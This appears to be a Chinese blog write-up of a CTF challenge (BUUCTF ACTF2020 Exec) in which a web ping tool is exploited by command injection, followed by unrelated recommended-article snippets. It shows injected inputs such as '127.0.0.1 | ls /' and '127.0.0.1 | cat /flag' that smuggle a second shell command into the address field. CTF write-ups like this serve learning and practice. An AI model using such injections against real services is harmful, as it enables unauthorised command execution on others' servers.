【BUUCTF】[ACTF2020 新生赛]Exec1

最新推荐文章于 2022-04-21 12:56:34 发布
原创 最新推荐文章于 2022-04-21 12:56:34 发布
· 3.3k 阅读 · 0 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

博客内容描述了一个关于通过在线ping工具进行命令注入的安全问题。作者发现可以通过在ping地址后添加管道符和命令来执行系统操作,如列出目录(ls)、查看文件内容(cat flag)。这揭示了一个潜在的网络安全风险,提示用户和开发者关注此类应用程序的安全防护。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目网站是一个可以ping各种地址的小程序,返回的应该是命令执行结果

于是想到注入其他命令

127.0.0.1 | ls

接着查看根目录

127.0.0.1 | ls /

 看见flag,最后打开它即可

127.0.0.1 | cat /flag

 

 

Vue2+Vue3基础入门实战项目(一)—— 课程学习笔记
最新发布
upgrade_bro的博客
08-21 3054
2023新版Vue2+Vue3基础入门实战项目Vue快速上手!
如何利用安卓手机搭建WEB服务器
热门推荐
Bevisy
07-14 2万+
利用安卓手机搭建WEB服务器背景介绍 Android是一种基于Linux的自由及开放源代码的操作系统所以是用安卓来搭建服务器是完全可行的。接下来将教大家如何利用AndroPHP和Feel FTP(或者其他FTP管理器)来在安卓手机上搭建一个wordpress博客 正式开始 下载并安装AndroPHP、Feel FTP和File Zilla 安装完成后打开AndroPHP,界面如下: 备注:此处
Eclipse 代码模板
shuimuzy的专栏
02-09 692
Eclipse 代码模板 使用代码模板 Eclipse 提供了通过定义和使用代码模板来提高工作效率与代码可预测性的能力。 我们在开发 Java 程序过程中经常需要编写 main 方法: public static void main(String[]args) { } 如果我们一个字母一个字母去编写,将是一个重复而又毫无意义的事情,这是我们就可以使用 Eclipse 代
Eclipse中的快速Java代码模板使用 java editor template
10-31 931
java editor template Eclipse中的快速Java代码模板使用             相信大家都用过Eclipse的缩写代码提示功能,如syso能补全为System.out.println();main能补全为完整的main方法,非常的方便。同时,我们也能自己编辑模板,提高自己的代码写作速度。    简介: Eclipse 提供了通过定义和使用代码模板来提高工作...
JavaScript 多维数组
zsx0728的博客
04-21 8162
文章目录创建多维数组访问数组的元素将元素添加到多维数组将元素添加到外部数组将元素添加到内部数组从多维数组中删除元素从外部数组中删除元素从内部数组中删除元素迭代多维数组参考文档     在本教程中,您将借助示例了解 JavaScript 多维数组。     多维数组是包含另一个数组的数组。例如, // multidimensional array const data = [[1, 2, 3], [1, 3, 4], [4, 5, 6]]; 创建多维数组     这是在 JavaScript 中创建多维数组
js中的多维数组
superyuan567的博客
12-15 4030
js中没有提供直接声明多维数组的方法,但是我们可以使用虚拟数组的方法实现,即数组的元素也是数组。 多维数组的声明: 通过对象字面量方法声明数组: var arr = [[1,2,3],[4,5,6],[7,8,9]]; 2.通过构造函数创建数组: var arr = new Array(4); for (var i=0;i<arr.length;i++){ arr[i] = ...
Vue入门笔记以及项目源码
04-18
这个压缩包中的“Vue入门笔记以及项目源码”提供了从基础到实践的全面学习材料,覆盖了Vue的核心概念和技术。 首先,让我们按照文件名的顺序逐个解析学习内容: 1. **Day 01**:通常会涵盖Vue的基础知识,包括Vue...
Eclipse代码模板
10-16
Eclipse代码模板,类注释,新建文件注释,方法注释等。可直接导入使用,方便快捷
Eclipse 中的 代码模板
KIDD的专栏
08-29 1519
编辑模板 要编辑一个模板,需要通过选择 Window > Preferences 打开 Eclipse Preferences。转到 Java > Editor > Templates 以查看现有的模板。要编辑一个现有的模板,单击列表中的这个模板并单击 Edit。Edit Template窗口会随即出现(参见图 1)。 图 1. 编辑模板 表 1 列出了 Edit T
eclipse代码模板
06-19
eclipse注释模板
Idea 部署Web项目
08-24
使用Idea部署Web项目的基本手册。全程图操作
RESTful API 设计最佳实践
白杨的专栏
05-01 9445
1. 背景REST(英文:Representational State Transfer,表述性状态转移)描述了一个架构样式的网络系统,比如 web 应用程序。 目前互联网上充斥着大量的关于RESTful API(为方便,下文中“RESTful API ”简写为“API”)如何设计的文章,然而却没有一个”万能“的设计标准:如何鉴权?API 格式如何?你的API是否应该加入版本信息?当你开始写一个a
php操作数据库
weixin_30950607的博客
04-12 146
  php操作数据库的两种方式;面向过程,面向对象式;   面向过程;   1.连接数据库的方法:mysqli_connect(参数一,参数二,参数三); 返回值是一个对象,对数据库的操作方法都在这个上面;   参数一:域名:127.0.0.1/localhost    建议localhost 必填   参数二:用户:root  必填   参数三:密码:root  必填   案例...
Eclipse的代码模板
千羽的博客
01-11 322
噫,这个功能真的好用。 Windows->Preference->Java->Editor->Templates new一个(我这个是edit) name是源字符,pattern是结果字符。 模板变量 ${ 就了有提示,Help->helpcontents也有介绍,搜索Java Editor Template Variables。 ...
!!!!!RESTful API 最佳实践!!!!!
m0_37477061的博客
03-02 187
http://www.ruanyifeng.com/blog/2018/10/restful-api-best-practices.html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值